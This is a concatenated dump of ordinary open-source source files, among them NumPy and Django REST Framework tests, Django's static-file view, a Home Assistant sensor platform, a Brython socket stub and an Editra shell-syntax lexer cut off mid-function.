a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a.flat[np.array([10])])
assert_raises(IndexError, lambda: assign(a.flat, np.array([10]), 5))
def test_mapping(self):
"cases from mapping.c"
def assign(obj, ind, val):
obj[ind] = val
a = np.zeros((0, 10))
assert_raises(IndexError, lambda: a[12])
a = np.zeros((3, 5))
assert_raises(IndexError, lambda: a[(10, 20)])
assert_raises(IndexError, lambda: assign(a, (10, 20), 1))
a = np.zeros((3, 0))
assert_raises(IndexError, lambda: a[(1, 0)])
assert_raises(IndexError, lambda: assign(a, (1, 0), 1))
a = np.zeros((10,))
assert_raises(IndexError, lambda: assign(a, 10, 1))
a = np.zeros((0,))
assert_raises(IndexError, lambda: assign(a, 10, 1))
a = np.zeros((3, 5))
assert_raises(IndexError, lambda: a[(1, [1, 20])])
assert_raises(IndexError, lambda: assign(a, (1, [1, 20]), 1))
a = np.zeros((3, 0))
assert_raises(IndexError, lambda: a[(1, [0, 1])])
assert_raises(IndexError, lambda: assign(a, (1, [0, 1]), 1))
def test_methods(self):
"cases from methods.c"
a = np.zeros((3, 3))
assert_raises(IndexError, lambda: a.item(100))
assert_raises(IndexError, lambda: a.itemset(100, 1))
a = np.zeros((0, 3))
assert_raises(IndexError, lambda: a.item(100))
assert_raises(IndexError, lambda: a.itemset(100, 1))
if __name__ == "__main__":
run_module_suite()
|
adelton/django
|
refs/heads/master
|
django/views/static.py
|
190
|
"""
Views and functions for serving static files. These are only to be used
during development, and SHOULD NOT be used in a production setting.
"""
from __future__ import unicode_literals
import mimetypes
import os
import posixpath
import re
import stat
from django.http import (
FileResponse, Http404, HttpResponse, HttpResponseNotModified,
HttpResponseRedirect,
)
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.http import http_date, parse_http_date
from django.utils.six.moves.urllib.parse import unquote
from django.utils.translation import ugettext as _, ugettext_lazy
def serve(request, path, document_root=None, show_indexes=False):
"""
Serve static files below a given point in the directory structure.
To use, put a URL pattern such as::
from django.views.static import serve
url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'})
in your URLconf. You must provide the ``document_root`` param. You may
also set ``show_indexes`` to ``True`` if you'd like to serve a basic index
of the directory. This index view will use the template hardcoded below,
but if you'd like to override it, you can create a template called
``static/directory_index.html``.
"""
path = posixpath.normpath(unquote(path))
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404(_("Directory indexes are not allowed here."))
if not os.path.exists(fullpath):
raise Http404(_('"%(path)s" does not exist') % {'path': fullpath})
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj.st_mtime, statobj.st_size):
return HttpResponseNotModified()
content_type, encoding = mimetypes.guess_type(fullpath)
content_type = content_type or 'application/octet-stream'
response = FileResponse(open(fullpath, 'rb'), content_type=content_type)
response["Last-Modified"] = http_date(statobj.st_mtime)
if stat.S_ISREG(statobj.st_mode):
response["Content-Length"] = statobj.st_size
if encoding:
response["Content-Encoding"] = encoding
return response
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
{% load i18n %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title>
</head>
<body>
<h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1>
<ul>
{% ifnotequal directory "/" %}
<li><a href="../">../</a></li>
{% endifnotequal %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
template_translatable = ugettext_lazy("Index of %(directory)s")
def directory_index(path, fullpath):
try:
t = loader.select_template([
'static/directory_index.html',
'static/directory_index',
])
except TemplateDoesNotExist:
t = Engine().from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE)
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory': path + '/',
'file_list': files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_mtime = parse_http_date(matches.group(1))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if int(mtime) > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
|
bluedynamics/bda.bfg.app
|
refs/heads/master
|
src/bda/bfg/app/browser/authoring.py
|
1
|
from repoze.bfg.view import bfg_view
from bda.bfg.tile import (
Tile,
tile,
registerTile,
render_tile,
)
from bda.bfg.app.model import (
getNodeInfo,
Properties,
BaseNode,
AdapterNode,
)
from bda.bfg.app.browser import render_main_template
from bda.bfg.app.browser.layout import ProtectedContentTile
from bda.bfg.app.browser.utils import (
make_url,
make_query,
)
@bfg_view('add', permission='login')
def add(model, request):
return render_main_template(model, request, contenttilename='add')
@tile('add', 'templates/add.pt', permission='login', strict=False)
class AddTile(ProtectedContentTile):
@property
def addform(self):
nodeinfo = self.info
if not nodeinfo:
return u'Unknown factory'
if AdapterNode in nodeinfo.node.__bases__:
addmodel = nodeinfo.node(BaseNode(), None, None)
else:
addmodel = nodeinfo.node()
addmodel.__parent__ = self.model
return render_tile(addmodel, self.request, 'addform')
@property
def info(self):
factory = self.request.params.get('factory')
allowed = self.model.nodeinfo.addables
        if not factory or not allowed or factory not in allowed:
return None
return getNodeInfo(factory)
@bfg_view('edit', permission='login')
def edit(model, request):
return render_main_template(model, request, contenttilename='edit')
registerTile('edit',
'bda.bfg.app:browser/templates/edit.pt',
class_=ProtectedContentTile,
permission='login',
strict=False)
@tile('add_dropdown', 'templates/add_dropdown.pt', strict=False)
class AddDropdown(Tile):
@property
def items(self):
ret = list()
addables = self.model.nodeinfo.addables
if not addables:
return ret
for addable in addables:
info = getNodeInfo(addable)
if not info:
continue
query = make_query(factory=addable)
url = make_url(self.request, node=self.model,
resource='add', query=query)
target = make_url(self.request, node=self.model, query=query)
props = Properties()
props.url = url
props.target = target
props.title = info.title
props.icon = info.icon
ret.append(props)
return ret
registerTile('contextmenu',
'bda.bfg.app:browser/templates/contextmenu.pt',
permission='login',
strict=True)
|
jabesq/home-assistant
|
refs/heads/dev
|
homeassistant/components/tellstick/sensor.py
|
7
|
"""Support for Tellstick sensors."""
import logging
from collections import namedtuple
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import TEMP_CELSIUS, CONF_ID, CONF_NAME
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DatatypeDescription = namedtuple('DatatypeDescription', ['name', 'unit'])
CONF_DATATYPE_MASK = 'datatype_mask'
CONF_ONLY_NAMED = 'only_named'
CONF_TEMPERATURE_SCALE = 'temperature_scale'
DEFAULT_DATATYPE_MASK = 127
DEFAULT_TEMPERATURE_SCALE = TEMP_CELSIUS
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_TEMPERATURE_SCALE, default=DEFAULT_TEMPERATURE_SCALE):
cv.string,
vol.Optional(CONF_DATATYPE_MASK, default=DEFAULT_DATATYPE_MASK):
cv.positive_int,
vol.Optional(CONF_ONLY_NAMED, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_ID): cv.positive_int,
vol.Required(CONF_NAME): cv.string,
})])
})
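# Illustrative configuration accepted by the schema above (IDs and names
# are invented; temperature_scale defaults to TEMP_CELSIUS when omitted):
#
#   sensor:
#     - platform: tellstick
#       datatype_mask: 1
#       only_named:
#         - id: 135
#           name: Outside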
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Tellstick sensors."""
from tellcore import telldus
import tellcore.constants as tellcore_constants
sensor_value_descriptions = {
tellcore_constants.TELLSTICK_TEMPERATURE:
DatatypeDescription('temperature', config.get(CONF_TEMPERATURE_SCALE)),
tellcore_constants.TELLSTICK_HUMIDITY:
DatatypeDescription('humidity', '%'),
tellcore_constants.TELLSTICK_RAINRATE:
DatatypeDescription('rain rate', ''),
tellcore_constants.TELLSTICK_RAINTOTAL:
DatatypeDescription('rain total', ''),
tellcore_constants.TELLSTICK_WINDDIRECTION:
DatatypeDescription('wind direction', ''),
tellcore_constants.TELLSTICK_WINDAVERAGE:
DatatypeDescription('wind average', ''),
tellcore_constants.TELLSTICK_WINDGUST:
DatatypeDescription('wind gust', '')
}
try:
tellcore_lib = telldus.TelldusCore()
except OSError:
_LOGGER.exception('Could not initialize Tellstick')
return
sensors = []
datatype_mask = config.get(CONF_DATATYPE_MASK)
if config[CONF_ONLY_NAMED]:
named_sensors = {
named_sensor[CONF_ID]: named_sensor[CONF_NAME]
for named_sensor in config[CONF_ONLY_NAMED]}
for tellcore_sensor in tellcore_lib.sensors():
if not config[CONF_ONLY_NAMED]:
sensor_name = str(tellcore_sensor.id)
else:
if tellcore_sensor.id not in named_sensors:
continue
sensor_name = named_sensors[tellcore_sensor.id]
for datatype in sensor_value_descriptions:
if datatype & datatype_mask and \
tellcore_sensor.has_value(datatype):
sensor_info = sensor_value_descriptions[datatype]
sensors.append(TellstickSensor(
sensor_name, tellcore_sensor,
datatype, sensor_info))
add_entities(sensors)
class TellstickSensor(Entity):
"""Representation of a Tellstick sensor."""
def __init__(self, name, tellcore_sensor, datatype, sensor_info):
"""Initialize the sensor."""
self._datatype = datatype
self._tellcore_sensor = tellcore_sensor
self._unit_of_measurement = sensor_info.unit or None
self._value = None
self._name = '{} {}'.format(name, sensor_info.name)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
def update(self):
"""Update tellstick sensor."""
self._value = self._tellcore_sensor.value(self._datatype).value
|
linjoahow/w17test_1
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/_socket.py
|
742
|
"""Implementation module for socket operations.
See the socket module for documentation."""
AF_APPLETALK = 16
AF_DECnet = 12
AF_INET = 2
AF_INET6 = 23
AF_IPX = 6
AF_IRDA = 26
AF_SNA = 11
AF_UNSPEC = 0
AI_ADDRCONFIG = 1024
AI_ALL = 256
AI_CANONNAME = 2
AI_NUMERICHOST = 4
AI_NUMERICSERV = 8
AI_PASSIVE = 1
AI_V4MAPPED = 2048
CAPI = '<capsule object "_socket.CAPI" at 0x00BC4F38>'
EAI_AGAIN = 11002
EAI_BADFLAGS = 10022
EAI_FAIL = 11003
EAI_FAMILY = 10047
EAI_MEMORY = 8
EAI_NODATA = 11001
EAI_NONAME = 11001
EAI_SERVICE = 10109
EAI_SOCKTYPE = 10044
INADDR_ALLHOSTS_GROUP = -536870911
INADDR_ANY = 0
INADDR_BROADCAST = -1
INADDR_LOOPBACK = 2130706433
INADDR_MAX_LOCAL_GROUP = -536870657
INADDR_NONE = -1
INADDR_UNSPEC_GROUP = -536870912
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IPPROTO_ICMP = 1
IPPROTO_IP = 0
IPPROTO_RAW = 255
IPPROTO_TCP = 6
IPPROTO_UDP = 17
IPV6_CHECKSUM = 26
IPV6_DONTFRAG = 14
IPV6_HOPLIMIT = 21
IPV6_HOPOPTS = 1
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_LOOP = 11
IPV6_PKTINFO = 19
IPV6_RECVRTHDR = 38
IPV6_RECVTCLASS = 40
IPV6_RTHDR = 32
IPV6_TCLASS = 39
IPV6_UNICAST_HOPS = 4
IPV6_V6ONLY = 27
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_HDRINCL = 2
IP_MULTICAST_IF = 9
IP_MULTICAST_LOOP = 11
IP_MULTICAST_TTL = 10
IP_OPTIONS = 1
IP_RECVDSTADDR = 25
IP_TOS = 3
IP_TTL = 4
MSG_BCAST = 1024
MSG_CTRUNC = 512
MSG_DONTROUTE = 4
MSG_MCAST = 2048
MSG_OOB = 1
MSG_PEEK = 2
MSG_TRUNC = 256
NI_DGRAM = 16
NI_MAXHOST = 1025
NI_MAXSERV = 32
NI_NAMEREQD = 4
NI_NOFQDN = 1
NI_NUMERICHOST = 2
NI_NUMERICSERV = 8
RCVALL_MAX = 3
RCVALL_OFF = 0
RCVALL_ON = 1
RCVALL_SOCKETLEVELONLY = 2
SHUT_RD = 0
SHUT_RDWR = 2
SHUT_WR = 1
SIO_KEEPALIVE_VALS = 2550136836
SIO_RCVALL = 2550136833
SOCK_DGRAM = 2
SOCK_RAW = 3
SOCK_RDM = 4
SOCK_SEQPACKET = 5
SOCK_STREAM = 1
SOL_IP = 0
SOL_SOCKET = 65535
SOL_TCP = 6
SOL_UDP = 17
SOMAXCONN = 2147483647
SO_ACCEPTCONN = 2
SO_BROADCAST = 32
SO_DEBUG = 1
SO_DONTROUTE = 16
SO_ERROR = 4103
SO_EXCLUSIVEADDRUSE = -5
SO_KEEPALIVE = 8
SO_LINGER = 128
SO_OOBINLINE = 256
SO_RCVBUF = 4098
SO_RCVLOWAT = 4100
SO_RCVTIMEO = 4102
SO_REUSEADDR = 4
SO_SNDBUF = 4097
SO_SNDLOWAT = 4099
SO_SNDTIMEO = 4101
SO_TYPE = 4104
SO_USELOOPBACK = 64
class SocketType:
pass
TCP_MAXSEG = 4
TCP_NODELAY = 1
__loader__ = '<_frozen_importlib.ExtensionFileLoader object at 0x00CA2D90>'
def dup(*args,**kw):
"""dup(integer) -> integer
Duplicate an integer socket file descriptor. This is like os.dup(), but for
sockets; on some platforms os.dup() won't work for socket file descriptors."""
pass
class error:
pass
class gaierror:
pass
def getaddrinfo(*args,**kw):
"""getaddrinfo(host, port [, family, socktype, proto, flags]) -> list of (family, socktype, proto, canonname, sockaddr)
Resolve host and port into addrinfo struct."""
pass
def getdefaulttimeout(*args,**kw):
"""getdefaulttimeout() -> timeout
Returns the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
def gethostbyaddr(*args,**kw):
"""gethostbyaddr(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostbyname(*args,**kw):
"""gethostbyname(host) -> address
Return the IP address (a string of the form '255.255.255.255') for a host."""
pass
def gethostbyname_ex(*args,**kw):
"""gethostbyname_ex(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostname(*args,**kw):
"""gethostname() -> string
Return the current host name."""
pass
def getnameinfo(*args,**kw):
"""getnameinfo(sockaddr, flags) --> (host, port)
Get host and port for a sockaddr."""
pass
def getprotobyname(*args,**kw):
"""getprotobyname(name) -> integer
Return the protocol number for the named protocol. (Rarely used.)"""
pass
def getservbyname(*args,**kw):
"""getservbyname(servicename[, protocolname]) -> integer
Return a port number from a service name and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
def getservbyport(*args,**kw):
"""getservbyport(port[, protocolname]) -> string
Return the service name from a port number and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
has_ipv6 = True
class herror:
pass
def htonl(*args,**kw):
"""htonl(integer) -> integer
Convert a 32-bit integer from host to network byte order."""
pass
def htons(*args,**kw):
"""htons(integer) -> integer
Convert a 16-bit integer from host to network byte order."""
pass
def inet_aton(*args,**kw):
"""inet_aton(string) -> bytes giving packed 32-bit IP representation
Convert an IP address in string format (123.45.67.89) to the 32-bit packed
binary format used in low-level network functions."""
pass
def inet_ntoa(*args,**kw):
"""inet_ntoa(packed_ip) -> ip_address_string
Convert an IP address from 32-bit packed binary format to string format"""
pass
def ntohl(*args,**kw):
"""ntohl(integer) -> integer
Convert a 32-bit integer from network to host byte order."""
pass
def ntohs(*args,**kw):
"""ntohs(integer) -> integer
Convert a 16-bit integer from network to host byte order."""
pass
def setdefaulttimeout(*args,**kw):
"""setdefaulttimeout(timeout)
Set the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
class socket:
def __init__(self,*args,**kw):
pass
def bind(self,*args,**kw):
pass
def close(self):
pass
class timeout:
pass
|
hnarayanan/django-rest-framework
|
refs/heads/master
|
tests/test_serializer.py
|
5
|
# coding: utf-8
from __future__ import unicode_literals
from .utils import MockObject
from rest_framework import serializers
from rest_framework.compat import unicode_repr
import pickle
import pytest
# Tests for core functionality.
# -----------------------------
class TestSerializer:
def setup(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
self.Serializer = ExampleSerializer
def test_valid_serializer(self):
serializer = self.Serializer(data={'char': 'abc', 'integer': 123})
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc', 'integer': 123}
assert serializer.errors == {}
def test_invalid_serializer(self):
serializer = self.Serializer(data={'char': 'abc'})
assert not serializer.is_valid()
assert serializer.validated_data == {}
assert serializer.errors == {'integer': ['This field is required.']}
def test_partial_validation(self):
serializer = self.Serializer(data={'char': 'abc'}, partial=True)
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc'}
assert serializer.errors == {}
def test_empty_serializer(self):
serializer = self.Serializer()
assert serializer.data == {'char': '', 'integer': None}
def test_missing_attribute_during_serialization(self):
class MissingAttributes:
pass
instance = MissingAttributes()
serializer = self.Serializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestValidateMethod:
def test_non_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError('Non field error')
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'non_field_errors': ['Non field error']}
def test_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError({'char': 'Field error'})
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'char': ['Field error']}
class TestBaseSerializer:
def setup(self):
class ExampleSerializer(serializers.BaseSerializer):
def to_representation(self, obj):
return {
'id': obj['id'],
'email': obj['name'] + '@' + obj['domain']
}
def to_internal_value(self, data):
name, domain = str(data['email']).split('@')
return {
'id': int(data['id']),
'name': name,
'domain': domain,
}
self.Serializer = ExampleSerializer
def test_serialize_instance(self):
instance = {'id': 1, 'name': 'tom', 'domain': 'example.com'}
serializer = self.Serializer(instance)
assert serializer.data == {'id': 1, 'email': 'tom@example.com'}
def test_serialize_list(self):
instances = [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'},
]
serializer = self.Serializer(instances, many=True)
assert serializer.data == [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'}
]
def test_validate_data(self):
data = {'id': 1, 'email': 'tom@example.com'}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {
'id': 1,
'name': 'tom',
'domain': 'example.com'
}
def test_validate_list(self):
data = [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'},
]
serializer = self.Serializer(data=data, many=True)
assert serializer.is_valid()
assert serializer.validated_data == [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'}
]
class TestStarredSource:
"""
Tests for `source='*'` argument, which is used for nested representations.
For example:
nested_field = NestedField(source='*')
"""
data = {
'nested1': {'a': 1, 'b': 2},
'nested2': {'c': 3, 'd': 4}
}
def setup(self):
class NestedSerializer1(serializers.Serializer):
a = serializers.IntegerField()
b = serializers.IntegerField()
class NestedSerializer2(serializers.Serializer):
c = serializers.IntegerField()
d = serializers.IntegerField()
class TestSerializer(serializers.Serializer):
nested1 = NestedSerializer1(source='*')
nested2 = NestedSerializer2(source='*')
self.Serializer = TestSerializer
def test_nested_validate(self):
"""
A nested representation is validated into a flat internal object.
"""
serializer = self.Serializer(data=self.data)
assert serializer.is_valid()
assert serializer.validated_data == {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
def test_nested_serialize(self):
"""
An object can be serialized into a nested representation.
"""
instance = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
serializer = self.Serializer(instance)
assert serializer.data == self.data
class TestIncorrectlyConfigured:
def test_incorrect_field_name(self):
class ExampleSerializer(serializers.Serializer):
incorrect_name = serializers.IntegerField()
class ExampleObject:
def __init__(self):
self.correct_name = 123
instance = ExampleObject()
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError) as exc_info:
serializer.data
msg = str(exc_info.value)
assert msg.startswith(
"Got AttributeError when attempting to get a value for field `incorrect_name` on serializer `ExampleSerializer`.\n"
"The serializer field might be named incorrectly and not match any attribute or key on the `ExampleObject` instance.\n"
"Original exception text was:"
)
class TestUnicodeRepr:
def test_unicode_repr(self):
class ExampleSerializer(serializers.Serializer):
example = serializers.CharField()
class ExampleObject:
def __init__(self):
self.example = '한국'
def __repr__(self):
return unicode_repr(self.example)
instance = ExampleObject()
serializer = ExampleSerializer(instance)
repr(serializer) # Should not error.
class TestNotRequiredOutput:
def test_not_required_output_for_dict(self):
"""
'required=False' should allow a dictionary key to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
assert serializer.data == {'included': 'abc'}
def test_not_required_output_for_object(self):
"""
'required=False' should allow an object attribute to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
def create(self, validated_data):
return MockObject(**validated_data)
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
serializer.save()
assert serializer.data == {'included': 'abc'}
def test_default_required_output_for_dict(self):
"""
'default="something"' should require dictionary key.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
serializer = ExampleSerializer({'included': 'abc'})
with pytest.raises(KeyError):
serializer.data
def test_default_required_output_for_object(self):
"""
'default="something"' should require object attribute.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
instance = MockObject(included='abc')
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestCacheSerializerData:
def test_cache_serializer_data(self):
"""
Caching serializer data with pickle will drop the serializer info,
but does preserve the data itself.
"""
class ExampleSerializer(serializers.Serializer):
field1 = serializers.CharField()
field2 = serializers.CharField()
serializer = ExampleSerializer({'field1': 'a', 'field2': 'b'})
pickled = pickle.dumps(serializer.data)
data = pickle.loads(pickled)
assert data == {'field1': 'a', 'field2': 'b'}
|
vadimtk/chrome4sdp
|
refs/heads/master
|
chrome/common/extensions/docs/server2/caching_rietveld_patcher_test.py
|
121
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from caching_rietveld_patcher import (CachingRietveldPatcher,
_VERSION_CACHE_MAXAGE)
from datetime import datetime
from object_store_creator import ObjectStoreCreator
from test_patcher import TestPatcher
_TEST_PATCH_VERSION = '1'
_TEST_PATCH_FILES = (['add.txt'], ['del.txt'], ['modify.txt'])
_TEST_PATCH_DATA = {
'add.txt': 'add',
'modify.txt': 'modify',
}
class FakeDateTime(object):
  def __init__(self, time=None):
    # A default of datetime.now() would be evaluated once at import time.
    self.time = time if time is not None else datetime.now()
def now(self):
return self.time
class CachingRietveldPatcherTest(unittest.TestCase):
def setUp(self):
self._datetime = FakeDateTime()
self._test_patcher = TestPatcher(_TEST_PATCH_VERSION,
_TEST_PATCH_FILES,
_TEST_PATCH_DATA)
self._patcher = CachingRietveldPatcher(
self._test_patcher,
ObjectStoreCreator(start_empty=False),
self._datetime)
def testGetVersion(self):
# Invalidate cache.
self._datetime.time += _VERSION_CACHE_MAXAGE
# Fill cache.
self._patcher.GetVersion()
count = self._test_patcher.get_version_count
# Should read from cache.
self._patcher.GetVersion()
self.assertEqual(count, self._test_patcher.get_version_count)
# Invalidate cache.
self._datetime.time += _VERSION_CACHE_MAXAGE
# Should fetch version.
self._patcher.GetVersion()
self.assertEqual(count + 1, self._test_patcher.get_version_count)
def testGetPatchedFiles(self):
# Fill cache.
self._patcher.GetPatchedFiles()
count = self._test_patcher.get_patched_files_count
# Should read from cache.
self._patcher.GetPatchedFiles()
self.assertEqual(count, self._test_patcher.get_patched_files_count)
def testApply(self):
# Fill cache.
self._patcher.Apply(['add.txt'], None).Get()
count = self._test_patcher.apply_count
# Should read from cache even though it's reading another file.
self._patcher.Apply(['modify.txt'], None).Get()
self.assertEqual(count, self._test_patcher.apply_count)
if __name__ == '__main__':
unittest.main()
|
ibinti/intellij-community
|
refs/heads/master
|
python/testData/inspections/ChainedComparison1_after.py
|
83
|
if e < a <= b < c <= d:
print "q"
|
beiko-lab/gengis
|
refs/heads/master
|
bin/Lib/site-packages/wx-2.8-msw-unicode/wx/tools/Editra/src/syntax/_sh.py
|
3
|
###############################################################################
# Name: sh.py #
# Purpose: Define Bourne/Bash/Csh/Korn Shell syntaxes for highlighting and #
# other features. #
# Author: Cody Precord <cprecord@editra.org> #
# Copyright: (c) 2007 Cody Precord <staff@editra.org> #
# License: wxWindows License #
###############################################################################
"""
FILE: sh.py
AUTHOR: Cody Precord
@summary: Lexer configuration file for Bourne, Bash, Kornshell and
C-Shell scripts.
"""
__author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: _sh.py 63834 2010-04-03 06:04:33Z CJP $"
__revision__ = "$Revision: 63834 $"
#-----------------------------------------------------------------------------#
# Imports
import wx.stc as stc
# Local Imports
import synglob
import syndata
#-----------------------------------------------------------------------------#
# Bourne Shell Keywords (bash and kornshell have these too)
COMM_KEYWORDS = ("break eval newgrp return ulimit cd exec pwd shift umask "
"chdir exit read test wait continue kill readonly trap "
"contained elif else then case esac do done for in if fi "
"until while set export unset")
# Bash/Kornshell extensions (in bash/kornshell but not bourne)
EXT_KEYWORDS = ("function alias fg integer printf times autoload functions "
"jobs r true bg getopts let stop type false hash nohup suspend "
"unalias fc history print time whence typeset while select")
# Bash Only Keywords
BSH_KEYWORDS = ("bind disown local popd shopt builtin enable logout pushd "
"source dirs help declare")
# Bash Shell Commands (statements)
BCMD_KEYWORDS = ("chmod chown chroot clear du egrep expr fgrep find gnufind "
"gnugrep grep install less ls mkdir mv reload restart rm "
"rmdir rpm sed su sleep start status sort strip tail touch "
"complete stop echo")
# Korn Shell Only Keywords
KSH_KEYWORDS = "login newgrp"
# Korn Shell Commands (statements)
KCMD_KEYWORDS = ("cat chmod chown chroot clear cp du egrep expr fgrep find "
"grep install killall less ls mkdir mv nice printenv rm rmdir "
"sed sort strip stty su tail touch tput")
# C-Shell Keywords
CSH_KEYWORDS = ("alias cd chdir continue dirs echo break breaksw foreach end "
"eval exec exit glob goto case default history kill login "
"logout nice nohup else endif onintr popd pushd rehash repeat "
"endsw setenv shift source time umask switch unalias unhash "
"unsetenv wait")
#---- Syntax Style Specs ----#
SYNTAX_ITEMS = [ (stc.STC_SH_DEFAULT, 'default_style'),
(stc.STC_SH_BACKTICKS, 'scalar_style'),
(stc.STC_SH_CHARACTER, 'char_style'),
(stc.STC_SH_COMMENTLINE, 'comment_style'),
(stc.STC_SH_ERROR, 'error_style'),
(stc.STC_SH_HERE_DELIM, 'here_style'),
(stc.STC_SH_HERE_Q, 'here_style'),
(stc.STC_SH_IDENTIFIER, 'default_style'),
(stc.STC_SH_NUMBER, 'number_style'),
(stc.STC_SH_OPERATOR, 'operator_style'),
(stc.STC_SH_PARAM, 'scalar_style'),
(stc.STC_SH_SCALAR, 'scalar_style'),
(stc.STC_SH_STRING, 'string_style'),
(stc.STC_SH_WORD, 'keyword_style') ]
#---- Extra Properties ----#
FOLD = ("fold", "1")
FLD_COMMENT = ("fold.comment", "1")
FLD_COMPACT = ("fold.compact", "0")
#------------------------------------------------------------------------------#
class SyntaxData(syndata.SyntaxDataBase):
"""SyntaxData object for various shell scripting languages"""
def __init__(self, langid):
syndata.SyntaxDataBase.__init__(self, langid)
# Setup
self.SetLexer(stc.STC_LEX_BASH)
def GetKeywords(self):
"""Returns Specified Keywords List """
keywords = list()
keyw_str = [COMM_KEYWORDS]
if self.LangId == synglob.ID_LANG_CSH:
keyw_str.append(CSH_KEYWORDS)
else:
if self.LangId != synglob.ID_LANG_BOURNE: # TODO ??
keyw_str.append(EXT_KEYWORDS)
if self.LangId == synglob.ID_LANG_BASH:
